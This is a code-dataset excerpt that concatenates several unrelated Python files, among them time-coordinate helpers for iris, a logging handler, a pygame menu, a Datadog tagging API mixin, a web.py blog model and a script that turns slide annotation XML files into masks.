            String representation of the cycletime units.
        calendar (str):
            Calendar used when interpreting the cycletime; must be one
            supported by cf_units.CALENDARS.

    Returns:
        float:
            Numeric representation of the datetime in the given unit
            and calendar.
    """
    cycle_datetime = cycletime_to_datetime(
        cycletime, cycletime_format=cycletime_format)
    return cf_units.date2num(cycle_datetime, time_unit, calendar)
def iris_time_to_datetime(time_coord, point_or_bound="point"):
    """
    Convert iris time to python datetime object. Working in UTC.

    Args:
        time_coord (iris.coords.Coord):
            Iris time coordinate element(s).
        point_or_bound (str):
            Either "point" to convert cell points or "bound" to convert
            cell bounds.

    Returns:
        list of datetime.datetime:
            The time element(s) recast as python datetime objects.

    Raises:
        ValueError: If point_or_bound is neither "point" nor "bound"
            (the original fell through to an UnboundLocalError).
    """
    coord = time_coord.copy()
    coord.convert_units("seconds since 1970-01-01 00:00:00")
    if point_or_bound == "point":
        datetime_list = [value.point for value in coord.cells()]
    elif point_or_bound == "bound":
        datetime_list = [value.bound for value in coord.cells()]
    else:
        raise ValueError(
            "point_or_bound must be 'point' or 'bound', got '{}'".format(
                point_or_bound
            )
        )
    return datetime_list
def datetime_to_iris_time(dt_in):
    """
    Convert python datetime.datetime into seconds since 1970-01-01 00Z.

    The input is treated as UTC.

    Args:
        dt_in (datetime.datetime):
            Time to be converted into seconds since 1970-01-01 00Z.

    Returns:
        numpy.int64:
            Whole seconds since the epoch.
    """
    seconds = dt_in.replace(tzinfo=timezone.utc).timestamp()
    return np.int64(seconds)
def datetime_constraint(time_in, time_max=None):
    """
    Build an iris time constraint from python datetime object(s).

    Args:
        time_in (datetime.datetime):
            The time to be used to build an iris constraint.
        time_max (datetime.datetime):
            Optional exclusive upper bound; if provided the constraint
            matches the range time_in <= t < time_max.

    Returns:
        iris.Constraint:
            An iris constraint for extracting data at the given time
            (or within the given range) from a cube.
    """
    lower = PartialDateTime(
        time_in.year, time_in.month, time_in.day, time_in.hour
    )
    if time_max is None:
        return Constraint(time=lambda cell: cell.point == lower)
    upper = PartialDateTime(
        time_max.year, time_max.month, time_max.day, time_max.hour
    )
    return Constraint(time=lambda cell: lower <= cell < upper)
def extract_cube_at_time(cubes, time, time_extract):
    """
    Extract a single cube at a given time from a cubelist.

    Args:
        cubes (iris.cube.CubeList):
            CubeList of a given diagnostic over several times.
        time (datetime.datetime object):
            Time at which forecast data is needed (used only to format
            the warning message).
        time_extract (iris.Constraint):
            Iris constraint for the desired time.

    Returns:
        iris.cube.Cube:
            Cube of data at the desired time, or None (after issuing a
            warning) if the time is not present in the cubelist.
    """
    try:
        # Tuple-unpacking raises ValueError unless exactly one cube
        # matches the constraint.
        (cube_in,) = cubes.extract(time_extract)
        return cube_in
    except ValueError:
        msg = "Forecast time {} not found within data cubes.".format(
            time.strftime("%Y-%m-%d:%H:%M")
        )
        warnings.warn(msg)
        return None
def extract_nearest_time_point(cube, dt, time_name="time", allowed_dt_difference=0):
    """Extract the time point nearest to the datetime provided.

    Args:
        cube (iris.cube.Cube):
            Cube or CubeList that will be extracted from using the supplied
            time_point.
        dt (datetime.datetime):
            Datetime representation of a time that will be used within the
            extraction from the cube supplied.
        time_name (str):
            Name of the "time" coordinate that will be extracted. This must
            be "time" or "forecast_reference_time".
        allowed_dt_difference (int):
            Maximum allowed difference, in seconds, between the datetime
            provided and the nearest time point within the cube. If this
            limit is exceeded, an error is raised. Default is 0.

    Returns:
        iris.cube.Cube:
            Cube extracted at the time point nearest to dt.

    Raises:
        ValueError: If time_name is invalid, or if the requested datetime
            is not available within the allowed difference.
    """
    if time_name not in ["time", "forecast_reference_time"]:
        # BUG FIX: the original never called .format(), so the raised
        # message contained a literal '{}' placeholder.
        msg = (
            "{} is not a valid time_name. "
            "The time_name must be either "
            "'time' or 'forecast_reference_time'."
        ).format(time_name)
        raise ValueError(msg)
    time_point = datetime_to_iris_time(dt)
    time_point_index = cube.coord(time_name).nearest_neighbour_index(time_point)
    (nearest_dt,) = iris_time_to_datetime(
        cube.coord(time_name).copy()[time_point_index]
    )
    if abs((dt - nearest_dt).total_seconds()) > allowed_dt_difference:
        msg = (
            "The datetime {} is not available within the input "
            "cube within the allowed difference {} seconds. "
            "The nearest datetime available was {}".format(
                dt, allowed_dt_difference, nearest_dt
            )
        )
        raise ValueError(msg)
    constr = iris.Constraint(coord_values={time_name: nearest_dt})
    cube = cube.extract(constr)
    return cube
|
StarcoderdataPython
|
3372793
|
<gh_stars>0
import json
from logzio.handler import LogzioHandler
class ExtensionLogHandler(LogzioHandler):
    """LogzioHandler that merges a fixed set of extra fields into every
    log record.

    The fields are supplied via the 'default_extra_fields' keyword
    argument at construction time.
    """
    def __init__(self, *args, **kwargs):
        # Pop our custom kwarg before delegating so the base class does
        # not receive an unexpected keyword argument.
        self.default_extra_fields = kwargs.pop('default_extra_fields')
        super().__init__(*args, **kwargs)
    def extra_fields(self, message):
        """Extend the base handler's per-message fields with the defaults."""
        extra_fields = super().extra_fields(message)
        extra_fields.update(self.default_extra_fields)
        return extra_fields
class RequestLogger:
    """Writes outgoing HTTP requests and incoming responses to a logger
    at DEBUG level, masking Authorization header values."""

    def __init__(self, logger):
        self.logger = logger

    def obfuscate(self, value):
        """Mask a credential value before it reaches the log.

        'ApiKey SU-...' credentials keep their key-id prefix; anything
        else is fully masked.
        """
        if not value.startswith('ApiKey SU-'):
            return '*' * 20
        return value.split(':')[0] + ':' + '*' * 10

    def log_request(self, method, url, kwargs):
        """Log the method, URL (with query params), headers and JSON body
        of an outgoing request."""
        other_args = {key: val for key, val in kwargs.items()
                      if key not in ('headers', 'json', 'params')}
        if 'params' in kwargs:
            url += '&' if '?' in url else '?'
            url += '&'.join(f'{key}={val}'
                            for key, val in kwargs['params'].items())
        lines = [
            '--- HTTP Request ---',
            f'{method.upper()} {url} {other_args if other_args else ""}',
        ]
        if 'headers' in kwargs:
            for name, value in kwargs['headers'].items():
                # Never log credentials in the clear.
                if name.lower() == 'authorization':
                    value = self.obfuscate(value)
                lines.append(f'{name}: {value}')
        if 'json' in kwargs:
            lines.append(json.dumps(kwargs['json'], indent=4))
        lines.append('')
        self.logger.debug('\n'.join(lines))

    def log_response(self, response):
        """Log the status line, headers and (JSON) body of a response."""
        # NOTE(review): presumably supports both requests-style
        # (.raw.reason) and httpx-style (.reason_phrase) responses —
        # confirm against callers.
        if getattr(response, 'raw', None):
            reason = response.raw.reason
        else:
            reason = response.reason_phrase
        lines = [
            '--- HTTP Response ---',
            f'{response.status_code} {reason}',
        ]
        lines.extend(f'{name}: {value}'
                     for name, value in response.headers.items())
        if response.headers.get('Content-Type', None) == 'application/json':
            lines.append(json.dumps(response.json(), indent=4))
        lines.append('')
        self.logger.debug('\n'.join(lines))
|
StarcoderdataPython
|
6624677
|
<filename>src/pyast_utils.py
# Copyright (c) 2019, IBM Research.
#
# Author: <NAME> <<EMAIL>>
#
# vim: set expandtab softtabstop=4 tabstop=4 shiftwidth=4:
import itertools
import copy
import ast as pyast
class StructureTupleYields(pyast.NodeTransformer):
    """ AST transformer for "structuring" yielded tuples

    For example, if structure is (2,3), then a yield expression, yielding a
    5-tuple: yield (a,b,c,d,e) will be transformed to yield ((a,b,),(c,d,e)).
    """

    def __init__(self, structure):
        """:param structure: iterable of ints, the sizes of the nested tuples."""
        super().__init__()
        self.structure = structure

    def visit_Yield(self, node):
        """Rewrite a ``yield`` of a flat tuple into a yield of nested tuples.

        Yields that are not tuples, or whose length does not equal
        sum(self.structure), are returned unchanged (with a diagnostic print).
        """
        # This yield is not a tuple, do nothing
        if not isinstance(node.value, pyast.Tuple):
            print(
                "*" * 10,
                "Yiedling something which is not a tuple. Doing nothing",
            )
            return node
        elts = node.value.elts
        ctx = node.value.ctx
        nelts = len(elts)
        if nelts != sum(self.structure):
            # BUG FIX: this branch previously referenced the undefined name
            # `structure`, raising NameError instead of printing a warning.
            print(
                "*" * 10,
                "Yiedling a tuple with size=%d while structure=%s. Doing nothing."
                % (nelts, self.structure),
            )
            return node
        new_elts = []
        elts_iter = iter(elts)
        for n in self.structure:
            xelts = list(itertools.islice(elts_iter, n))
            xtuple = pyast.Tuple(xelts, copy.copy(ctx))
            new_elts.append(xtuple)
        # sanity check that there are no more elements in the iterator
        # (they shouldn't be since we checked the length)
        try:
            next(elts_iter)
            assert False
        except StopIteration:
            pass
        new_node = pyast.Yield(pyast.Tuple(new_elts, copy.copy(ctx)))
        return pyast.copy_location(new_node, node)
|
StarcoderdataPython
|
6452724
|
"""Directory structure and paths."""
import platform
from pathlib import Path
# Download URLs for the Rosstat BOO open-data dumps, keyed by year.
# Key 0 is the reference-data archive (RAR), not a yearly CSV.
URL = {
    0: 'http://s3.eu-central-1.amazonaws.com/boo2012/data_reference.rar',
    2012: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2012/data-20181029t000000-structure-20121231t000000.csv',
    2013: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2013/data-20181029t000000-structure-20131231t000000.csv',
    2014: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2014/data-20181029t000000-structure-20141231t000000.csv',
    2015: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2015/data-20181029t000000-structure-20151231t000000.csv',
    2016: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2016/data-20181029t000000-structure-20161231t000000.csv',
    2017: 'http://www.gks.ru/opendata/storage/7708234640-bdboo2017/data-20181029t000000-structure-20171231t000000.csv',
}
# Explicit public API of this module.
__all__ = ['url',
           'url_local_path',
           'csv_path_raw',
           'csv_path_interim',
           'csv_path_processed',
           ]
# Repository root, assuming this file lives one level below it (e.g. src/).
PROJECT_ROOT = Path(__file__).parents[1]
IS_WINDOWS = (platform.system() == 'Windows')
# RAR executable
if IS_WINDOWS:
    # Bundled binary on Windows; on other systems `unrar` must be on PATH.
    UNPACK_RAR_EXE = str(PROJECT_ROOT / 'bin' / 'unrar.exe')
else:
    UNPACK_RAR_EXE = 'unrar'
def url(year: int):
    """Return the download URL registered for *year* (KeyError if unknown)."""
    return URL[year]
# Import-time smoke check.
assert url(2012) == URL[2012]
def make_subfolder(subfolder: str):
    """Return /data/<subfolder> path. Creates subfolders if they do not exist.

    Raises ValueError for an unknown *subfolder* name (see check_subfolder).
    """
    check_subfolder(subfolder)
    folder = PROJECT_ROOT / 'data' / subfolder
    # exist_ok avoids the check-then-create race of the previous
    # exists()/mkdir() pair when several processes start concurrently.
    folder.mkdir(parents=True, exist_ok=True)
    return folder
def check_subfolder(name: str):
    """Validate that *name* is a known data subfolder; raise ValueError otherwise."""
    if name not in ('external', 'raw', 'interim', 'processed'):
        # Fixed typo in the error message ("worng" -> "wrong").
        raise ValueError(f"wrong subfolder name: {name}")
def url_filename(url):
    """Return the final path component of *url* (the remote file name)."""
    return url.rsplit('/', 1)[-1]
# Import-time smoke check against a known URL.
assert url_filename(URL[2012]) == 'data-20181029t000000-structure-20121231t000000.csv'
def url_local_path(year: int):
    """Return the local path under data/external where *year*'s source file is stored."""
    return make_subfolder('external') / url_filename(URL[year])
def csv_filename(year: int):
    """Return the canonical CSV file name for *year*, e.g. '2012.csv'."""
    return '{}.csv'.format(year)
def _path_as_string(year, subfolder):
    """Return the string path of *year*'s CSV inside data/<subfolder> (creates the folder)."""
    return str(make_subfolder(subfolder) / csv_filename(year))
def csv_path_raw(year):
    """String path of the raw CSV for *year*."""
    return _path_as_string(year, 'raw')


def csv_path_interim(year):
    """String path of the interim CSV for *year*."""
    return _path_as_string(year, 'interim')


def csv_path_processed(year):
    """String path of the processed CSV for *year*."""
    return _path_as_string(year, 'processed')


# Smoke checks built with Path so they hold with both Windows ('\\') and
# POSIX ('/') separators; the previous hard-coded '\\data\\raw\\2012.csv'
# suffixes made the module fail to import everywhere except Windows.
assert csv_path_raw(2012).endswith(str(Path('data', 'raw', '2012.csv')))
assert csv_path_interim(2012).endswith(str(Path('data', 'interim', '2012.csv')))
assert csv_path_processed(2012).endswith(str(Path('data', 'processed', '2012.csv')))
#def tempfile(filename: str):
# return make_data_path('temp', filename)
|
StarcoderdataPython
|
3558448
|
from argparse import ArgumentParser
from sys import stdin
from mlmorph import Generator, Analyser
def main():
    """Invoke a simple CLI analyser or generator."""
    parser = ArgumentParser()
    parser.add_argument('-i', '--input', metavar="INFILE", type=open,
                        dest="infile", help="source of analysis data")
    parser.add_argument('-a', '--analyse', action='store_true',
                        help="Analyse the input file strings")
    parser.add_argument('-g', '--generate', action='store_true',
                        help="Generate the input file strings")
    parser.add_argument('-v', '--verbose', action='store_true',
                        help="print verbosely while processing")
    options = parser.parse_args()
    # Fall back to standard input when no file was given.
    if not options.infile:
        options.infile = stdin
    if options.verbose:
        print("reading from", options.infile.name)
    analyser = Analyser()
    generator = Generator()
    for raw_line in options.infile:
        word = raw_line.strip()
        if not word:
            # Skip blank lines.
            continue
        if options.analyse:
            analyses = analyser.analyse(word, True)
            if not analyses:
                print(word, "\t?")
            for result in analyses:
                print(word, "\t", result[0], "\t", result[1])
        if options.generate:
            generations = generator.generate(word, True)
            if not generations:
                print(word, "\t?")
            for result in generations:
                print(word, "\t", result[0], "\t", result[1])
            print()
    exit(0)


if __name__ == "__main__":
    main()
|
StarcoderdataPython
|
3305205
|
import pygame
from sys import exit
#from KinectTools import PyKinectRuntime
#from KinectTools import PyKinectV2
import ctypes
from Stamina.stamina import stamina
from faceRecognition.Login import login
from faceRecognition.Signup import signup
from utils.utils import scale
from utils.utils import choose,click
class ui(object):
    """Pygame main-menu screen; hands off to the stamina module when started.

    NOTE(review): SCREEN_WIDTH is derived from 2160 and SCREEN_HEIGHT from
    3840 (a portrait orientation) -- confirm this is intended and not swapped.
    """
    def __init__(self,n):
        # n is a downscale divisor applied to the native 2160x3840 resolution.
        self.SCREEN_WIDTH= int(2160 / n)
        self.SCREEN_HEIGHT= int(3840 / n)
        self.n = n
        # 0 while the menu is showing; 1 once the user picks the start tile.
        self.start_flag = 0
        pygame.init()
        self._clock = pygame.time.Clock()
        self.screen = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT),pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE,32)
        # Off-screen surface the menu tiles are composed onto before blitting.
        self.display_surface = pygame.Surface((self.SCREEN_WIDTH,self.SCREEN_HEIGHT))
        pygame.display.set_caption('v0.1')
        #self.start = Image("images/poster.png", (0, 0), self.screen)
        #self.stat = self.start.image
        #self.position = self.start.image.get_rect()
    #
    # def load_face_images(self):
    #     self.login =
    #     self.signup =
    #
    # def start(self,position):
    #     # start = Image("images/poster.png",(0,0),self.screen)
    #     self.start.render(position)
    def load_set_images(self):
        """Load, scale, and blit the four menu tiles plus the logo.

        Tile positions are expressed as fractions of a 375x667 design grid
        scaled to the current screen size; 5.76 appears to be the design-to-
        pixel scale factor (assumption -- TODO confirm).
        """
        #self.background = pygame.Surface((1080,1920))
        #self.background.fill((255,255,255))
        self.zhidao_image = pygame.image.load('images/1.jpeg')
        self.zhidao_image = pygame.transform.smoothscale(self.zhidao_image,(int(168 * 5.76 / self.n),int(259 * 5.76 / self.n)))
        self.zh = (16*self.SCREEN_WIDTH)/375
        self.zz = (189*self.SCREEN_HEIGHT)/667
        self.display_surface.blit(self.zhidao_image,(self.zh,self.zz))
        self.meiyan_image = pygame.image.load('images/2.jpeg')
        self.meiyan_image = pygame.transform.smoothscale(self.meiyan_image, (int(168 * 5.76 / self.n), int(120 * 5.76 /self.n)))
        self.mh = (16 * self.SCREEN_WIDTH) / 375
        self.mz = (456 * self.SCREEN_HEIGHT) / 667
        self.display_surface.blit(self.meiyan_image, (self.mh, self.mz))
        # The "pinggu" tile is the one change_mode() hit-tests for start.
        self.pinggu_image = pygame.image.load('images/3.jpeg')
        self.pinggu_image = pygame.transform.smoothscale(self.pinggu_image, (int(168 * 5.76 /self.n), int(164 * 5.76 / self.n)))
        self.ph = (192 * self.SCREEN_WIDTH) / 375
        self.pz = (189 * self.SCREEN_HEIGHT) / 667
        self.display_surface.blit(self.pinggu_image, (self.ph, self.pz))
        self.baogao_image = pygame.image.load('images/4.jpeg')
        self.baogao_image = pygame.transform.smoothscale(self.baogao_image, (int(168 * 5.76 /self.n), int(215 * 5.76 / self.n)))
        self.bh = (192 * self.SCREEN_WIDTH) / 375
        self.bz = (361 * self.SCREEN_HEIGHT) / 667
        self.display_surface.blit(self.baogao_image, (self.bh, self.bz))
        # self.bh = (192 * self.SCREEN_WIDTH / 375)
        # self.bz = (361 * self.SCREEN_HEIGHT / 667)
        # self.baogao_image = Image("images/4.jpeg",None,(self.bh,self.bz))
        # #self.baogao_image.update()
        # self.display_surface.blit(self.baogao_image.image,(self.bh,self.bz))
        #
        #
        # self.meiyan_image = pygame.image.load('images/2.jpg')
        # mwidth = (int)(self.meiyan_image.get_width()*1.43/self.n)
        # mheight = (int)(self.meiyan_image.get_height()*1.43/self.n)
        # self.meiyan_image = pygame.transform.scale(self.meiyan_image,(mwidth,mheight))
        # self.screen.blit(self.meiyan_image,[16/375*self.SCREEN_WIDTH,456/667*self.SCREEN_HEIGHT])
        #
        # self.jiance_image = pygame.image.load('images/3.jpg')
        # width = (int)(self.jiance_image.get_width()*1.44/self.n)
        # height = (int)(self.jiance_image.get_height()*1.44/self.n)
        # self.jiance_image = pygame.transform.scale(self.jiance_image,(width,height))
        # self.screen.blit(self.jiance_image,[192/375 * self.SCREEN_WIDTH,189/667*self.SCREEN_HEIGHT])
        #
        # self.baogao_image = pygame.image.load('images/4.jpg')
        # width = (int)(self.baogao_image.get_width()*1.44/self.n)
        # height = (int)(self.baogao_image.get_height()*1.44/self.n)
        # self.baogao_image = pygame.transform.scale(self.baogao_image,(width,height))
        # self.screen.blit(self.baogao_image,[192/375 * self.SCREEN_WIDTH,361/667 *self.SCREEN_HEIGHT])
        #
        self.logo_image = pygame.image.load('images/logo2.png')
        self.logo_image = pygame.transform.smoothscale(self.logo_image,
                                                       (int(82 * 5.76 / self.n), int(74 * 5.76 / self.n)))
        self.lh = (150 * self.SCREEN_WIDTH) / 375
        self.lz = (44 * self.SCREEN_HEIGHT) / 667
        self.display_surface.blit(self.logo_image, (self.lh, self.lz))
        # width = (int)(41 * 2 * 2 / self.n)
        # height = (int)(37 * 2 * 2 / self.n)
        # self.logo_image = pygame.transform.scale(self.logo_image,(width,height))
        # self.screen.blit(self.logo_image,[172/375* self.SCREEN_WIDTH,44/667 * self.SCREEN_HEIGHT])
        # self.menu = pygame.image.load("images/menu.png").convert_alpha()
        # mwidth = (int)(self.menu.get_width()*1.43/self.n)
        # mheight = (int)(self.menu.get_height()*1.43/self.n)
        # self.menu = pygame.transform.scale(self.menu,(mwidth,mheight))
        # self.display_surface.blit(self.menu,[0,0])
    def change_mode(self):
        """Return 2 when the 'pinggu' tile is clicked (via utils.click), else None."""
        if click(self.pinggu_image,(self.ph,self.pz)):
            print("into2")
            return 2
    def run(self):
        """Run the menu loop until the start tile is clicked, then launch stamina."""
        #self.screen.blit(self.display_surface,[0,0])
        # self.start.render((0,0))
        # h = 0
        while self.start_flag == 0:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    pygame.quit()
                    exit()
            # NOTE(review): tiles are reloaded from disk every frame here;
            # consider loading once before the loop.
            print("set_images...")
            self.load_set_images()
            self.screen.blit(self.display_surface,(0,0))
            if self.change_mode() == 2:
                print("kinect will work!")
                self.start_flag = 1
            pygame.display.update()
            self._clock.tick(60)
        # Hand control to the stamina screen once started.
        c = stamina(self.screen,self.n)
        c.run()
        print("kinect ends")
|
StarcoderdataPython
|
8048704
|
# Public API of this module.
__all__ = [
    'InfrastructureApi',
]
class InfrastructureApi(object):
    # Mixin: expects the composing class to provide `http_request(method, path,
    # body=None, response_formatter=..., **params)` -- TODO confirm the exact
    # contract against the class this is mixed into.
    #
    # NOTE(review): `basestring` (used below) exists only on Python 2; on
    # Python 3 the isinstance checks raise NameError. Verify the supported
    # interpreter before reuse.
    def search(self, query):
        """
        Search datadog for hosts and metrics by name. The search *query* can be
        faceted to limit the results (e.g. ``"hosts:foo"``, or ``"metrics:bar"``)
        or un-faceted, which will return results of all types (e.g. ``"baz"``).
        Return a dictionary mapping each queried facet to a list of name
        strings.
        >>> dog_http_api.search("cassandra")
        { "results": {
            "hosts": ["cassandraHostA", "cassandraHostB", ...],
            "metrics": ["cassandra.load", "cassandra.requests", ...]
          }
        }
        """
        return self.http_request('GET', '/search', q=query,
                                 response_formatter=lambda x: x['results'],
                                 )
    def all_tags(self, source=None):
        """
        Get a list of tags for your org and their member hosts.
        >>> dog_http_api.all_tags()
        [ { 'tag1': [ 'host1', 'host2', ... ] }, ... ]
        """
        params = {}
        if source:
            params['source'] = source
        return self.http_request('GET', '/tags/hosts',
                                 response_formatter=lambda x: x['tags'],
                                 **params
                                 )
    def host_tags(self, host_id, source=None, by_source=False):
        """
        Get a list of tags for the specified host by name or id.
        >>> dog_http_api.host_tags('web.example.com')
        ['web', 'env:production']
        >>> dog_http_api.host_tags(1234)
        ['database', 'env:test']
        """
        params = {}
        if source:
            params['source'] = source
        if by_source:
            params['by_source'] = 'true'
        return self.http_request('GET', '/tags/hosts/' + str(host_id),
                                 response_formatter=lambda x: x['tags'],
                                 **params
                                 )
    def add_tags(self, host_id, tags, source=None):
        """add_tags(host_id, [tag1, tag2, ...])
        Add one or more tags to a host.
        >>> dog_http_api.add_tags(host_id, ['env:test'])
        >>> dog_http_api.add_tags(host_id, ['env:test', 'database'])
        """
        # Accept a single tag string as a convenience.
        if isinstance(tags, basestring):
            tags = [tags]
        body = {
            'tags': tags,
        }
        params = {}
        if source:
            params['source'] = source
        return self.http_request('POST', '/tags/hosts/' + str(host_id), body,
                                 response_formatter=lambda x: x['tags'],
                                 **params
                                 )
    def change_tags(self, host_id, tags, source=None):
        """change_tags(host_id, [tag1, tag2, ...])
        Replace a host's tags with one or more new tags.
        >>> dog_http_api.change_tags(host_id, ['env:test'])
        >>> dog_http_api.change_tags(host_id, ['env:test', 'database'])
        """
        # Accept a single tag string as a convenience.
        if isinstance(tags, basestring):
            tags = [tags]
        body = {
            'tags': tags
        }
        params = {}
        if source:
            params['source'] = source
        return self.http_request('PUT', '/tags/hosts/' + str(host_id), body,
                                 response_formatter=lambda x: x['tags'],
                                 **params
                                 )
    def detach_tags(self, host_id, source=None):
        """
        Remove all tags from a host.
        >>> dog_http_api.detach_tags(123)
        """
        params = {}
        if source:
            params['source'] = source
        return self.http_request('DELETE', '/tags/hosts/' + str(host_id),
                                 **params
                                 )
StarcoderdataPython
|
4848827
|
<gh_stars>1-10
import web, datetime
# Module-level web.py database handle shared by all helpers below.
# NOTE(review): "<PASSWORD>" is a redacted placeholder -- supply the real
# credential via configuration, never commit it to source.
db = web.database(dbn='mysql', db='webpy_demo', user='dbuser',pw="<PASSWORD>")
def get_posts():
    """Return all entries, newest first."""
    return db.select('entries', order='id DESC')
def get_post(id):
    """Return the entry with the given id, or None when it does not exist."""
    try:
        return db.select('entries', where='id=$id', vars=locals())[0]
    except IndexError:
        return None
def new_post(title, text):
    """Insert a new entry timestamped with the current UTC time."""
    db.insert('entries', title=title, content=text, posted_on=datetime.datetime.utcnow())
def del_post(id):
    """Delete the entry with the given id."""
    db.delete('entries', where="id=$id", vars=locals())
def update_post(id, title, text):
    """Update title and content of the entry with the given id."""
    db.update('entries', where="id=$id", vars=locals(),
        title=title, content=text)
StarcoderdataPython
|
6581038
|
<reponame>3dimaging/DeepLearningCamelyon_II
#!/home/wli/env python3
# -*- coding: utf-8 -*-
"""
Title: convert XML to binary mask
=================================
Created: 10-31-2019
Python-Version: 3.5, 3.6
Description:
------------
This module is used to generate binary mask files from the annotations (XML files).
This module is needed for generating mask files for testing WSIs because the code coming with ASAP showed
errors for mask generation on certain testing WSIs.
Inputs:
*******
xml_folder = '/raida/wjc/CAMELYON16/testing/lesion_annotations'
slide_folder = '/raida/wjc/CAMELYON16/testing/images'
level = 5 : the level of zoom (0 is the highest; 5 is the 32x
downsampled image from level 0).
Output:
*******
result_folder = '/raidb/wli/testing_1219/mask_for_testing_wsi'
Note:
-----
If you need more information about how ElementTree package handle XML file,
please follow the link:
#https://docs.python.org/3/library/xml.etree.elementtree.html
"""
import math
import glob
import pandas as pd
import xml.etree.ElementTree as et
from pandas import DataFrame
import openslide
import numpy as np
import cv2
import matplotlib.pyplot as plt
import logging
import os.path as osp
import sys
sys.path.append('/home/weizhe.li/dldp/utils/logman')
sys.path.append('/home/weizhe.li/dldp/utils')
# setup_logging
import fileman as fm
import logger_management
from logger_management import log_with_template
from logger_management import StreamToLogger
from logger_management import setup_logging
# import multiresolutionimageinterface as mir
# reader = mir.MultiResolutionImageReader()
# mr_image = reader.open('/home/wli/Downloads/tumor_036.tif')
# Ximageorg, Yimageorg = mr_image.getDimensions()
# dims = mr_image.getLevelDimensions(4)
# Ximage = (Ximage+240//2)//240
# Ximage = 4000
# Yimage = (Yimage+240//2)//240
# Yimage = 2000
class mask_generator(object):
    """
    Generate a single binary mask file (not a pyramid) from an ASAP
    annotation XML file.
    """

    def __init__(self, xml_file, level, dims, result_folder=None):
        """
        :param xml_file: path of the annotation XML file.
        :param level: WSI zoom level (0 is the highest resolution).
        :param dims: (width, height) of the WSI at level 0.
        :param result_folder: optional default output folder. BUG FIX: the
            previous version read a module-level global of the same name
            (NameError when absent); it is now an explicit parameter.
        """
        self.xml_file = xml_file
        self.level = level
        self.dims = dims
        self.result_folder = result_folder

    def convert_xml_df(self):
        """
        To convert a xml file to a dataframe with columns
        ['Name', 'Order', 'X', 'Y'], X/Y down-sampled to self.level.

        :return: df_xml: x, y coordinates
        :rtype: dataframe
        """
        down_sample = 2**self.level
        parseXML = et.parse(self.xml_file)
        root = parseXML.getroot()
        dfcols = ['Name', 'Order', 'X', 'Y']
        # Accumulate rows in a list: DataFrame.append per coordinate is
        # deprecated in pandas and quadratic in the number of coordinates.
        rows = []
        for child in root.iter('Annotation'):
            for coordinate in child.iter('Coordinate'):
                rows.append([
                    child.attrib.get('Name'),
                    coordinate.attrib.get('Order'),
                    float(coordinate.attrib.get('X')) // down_sample,
                    float(coordinate.attrib.get('Y')) // down_sample,
                ])
        df_xml = pd.DataFrame(rows, columns=dfcols)
        print('redundent xml:', df_xml.shape)
        return df_xml

    def points_collection(self, annotations):
        """
        Group the (X, Y) coordinates by annotation name.

        :param annotations: DataFrame produced by convert_xml_df.
        :return: (list of int32 coordinate arrays, list of annotation names)
        :rtype: tuple
        """
        final_name_list = list(annotations['Name'].unique())
        coxy = [[] for _ in range(len(final_name_list))]
        for index, n in enumerate(final_name_list):
            newx = annotations[annotations['Name'] == n]['X']
            newy = annotations[annotations['Name'] == n]['Y']
            coxy[index] = np.array(list(zip(newx, newy)), dtype=np.int32)
        return (coxy, final_name_list)

    def mask_gen(self, coxy, result_folder):
        """
        Generate a binary mask PNG filled from the annotation polygons.

        :param coxy: list of int32 polygon coordinate arrays.
        :param result_folder: output directory for the PNG.
        :type result_folder: str
        """
        # Canvas matches the WSI dimensions down-sampled to self.level.
        canvas = np.zeros(
            (int(self.dims[1] // 2**self.level),
             int(self.dims[0] // 2**self.level)),
            np.uint8)
        cv2.fillPoly(canvas, pts=coxy, color=(255, 255, 255))
        cv2.imwrite('%s/%s.png' % (
            result_folder,
            osp.splitext(osp.basename(self.xml_file))[0]), canvas)
class lesion_count(mask_generator):
    """mask_generator subclass that summarises each annotated lesion contour."""

    def __init__(self, xml_file, level, dims):
        # BUG FIX: the previous __init__ took no arguments (so the
        # three-argument call sites raised TypeError) and referenced
        # super().__init__ without calling it. Forward to the parent.
        super().__init__(xml_file, level, dims)

    def gen_lesion_table(self, coxy, final_name_list):
        """
        Return [name, (centroid_x, centroid_y), area] for every contour.

        :param coxy: list of int32 polygon coordinate arrays.
        :param final_name_list: annotation names matching coxy by index.
        """
        lesion_total = []
        # BUG FIX: previously zipped with the undefined name `contour_names`.
        for coord, lesion_name in list(zip(coxy, final_name_list)):
            M = cv2.moments(coord)
            cX = int(M["m10"] / M["m00"])
            cY = int(M["m01"] / M["m00"])
            lesion_total.append([lesion_name, (cX, cY), cv2.contourArea(coord)])
        return lesion_total
if __name__ == '__main__':
    # setup_logging
    module_name = sys.modules['__main__'].__file__
    log_template_path = '/home/weizhe.li/dldp/utils/logman/logging_config.yaml'
    # The log template is also inculded in this package.
    # log_template_path = '.../dldp/utils/logman/logging_config.yaml'
    logger = log_with_template(log_template_path, module_name)
    # xml_folder = '/home/wzli/Downloads/CAMELYON16/testing/
    # lesion_annotations/'
    # xml_folder = '/home/wzli/Downloads/CAMELYON16/training/
    # lesion_annotations_training/'
    xml_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_annotations'
    xml_paths = fm.list_file_in_dir_II(xml_folder, 'xml')
    logger.debug('the fist xml file is %s' % xml_paths[0])
    # xml_paths = glob.glob(osp.join(xml_folder, '*.xml'))
    # xml_paths.sort()
    # slide_folder = '/home/wzli/Downloads/CAMELYON16/testing/images/'
    slide_folder = '/projects01/wxc4/CAMELYON16-training/tumor'
    result_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_counts'
    # NOTE(review): `creat_folder` spelling follows the fm module's API.
    created_folder = fm.creat_folder('', result_folder)
    # slide_paths = glob.glob(osp.join(slide_folder, '*.tif'))
    level = 5
    ############################lesion count#######################################
    lesion_total = []
    col_names = ['slide_name', 'lesion_name', 'centroid', 'area']
    for xml_file in xml_paths:
        # Derive the matching WSI name from the annotation file name.
        slide_name = osp.basename(xml_file.replace('.xml', '.tif'))
        slide_path = osp.join(slide_folder, slide_name)
        wsi_image = openslide.open_slide(slide_path)
        dims = wsi_image.dimensions
        mask_gen = mask_generator(xml_file, level, dims)
        annotations = mask_gen.convert_xml_df()
        final_annotations, _ = mask_gen.points_collection(annotations)
